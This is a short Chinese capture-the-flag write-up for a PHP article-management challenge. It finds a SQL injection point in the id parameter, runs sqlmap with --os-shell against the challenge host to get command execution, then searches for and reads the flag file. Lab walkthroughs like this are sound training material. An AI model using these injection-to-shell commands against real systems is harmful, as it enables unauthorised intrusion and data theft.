当前位置: 首页 > article >正文

青少年CTF练习平台 文章管理系统(sqlmap使用os-shell找flag)PHP

article 2025/1/18 7:56:19

题目

点击下一篇出现参数id,单引号报错

 找到注入点启动sqlmap

用sqlmap的os-shell执行命令获取flag

python sqlmap.py -u http://challenge.qsnctf.com:32372/?id=1 --os-shell

 执行命令查找flag

find / -name flag*
find / -name *flag

 

发现/flag目录,拿下FLAG

cat /flag

 


http://www.kler.cn/a/507555.html

相关文章:

  • SQLite 3.48.0 发布,有哪些更新?
  • 图数据库 | 18、高可用分布式设计(中)
  • 强化学习-蒙特卡洛方法
  • Linux自学指南(学习路线大纲)
  • hadoop3.3和hive4.0安装——单节点
  • 工作记录小点
  • 选择saas 还是源码主要考虑
  • 网络编程:基于TCP/UDP实现客户端和服务端通信(C语言实现简单易懂)
  • 如何在若依框架中自定义添加一个页面
  • 相机拍照参数:WB、FF、S、ISO、EV、焦距
  • 08、如何预防SQL注入
  • 《机器学习》——PCA降维
  • 1.快慢指针-力扣-283-移动零
  • 软件测试入门—功能需求分析:以一个旅游管理系统为例
  • LeetCode 1426 题:数元素解题全解析
  • 【机器学习实战入门项目】MNIST数字分类机器学习项目
  • 用C++实现一个基于模板的观察者设计模式
  • MySQL的不同SQL模式导致行为不同?
  • 【北京迅为】iTOP-4412全能版使用手册-第七十六章 Qt界面切换
  • Kubernetes(k8s)和Docker Compose本质区别
  • 20.<Spring图书管理系统①(登录+添加图书)>
  • 6.3、OTN 保护
  • Linux 文件权限详解
  • Unity Dots理论学习-3.ECS有关的模块(2)
  • 【FlutterDart】MVVM(Model-View-ViewModel)架构模式例子-http版本(30 /100)
  • 阿里云通义实验室自然语言处理方向负责人黄非:通义灵码2.0,迈入 Agentic AI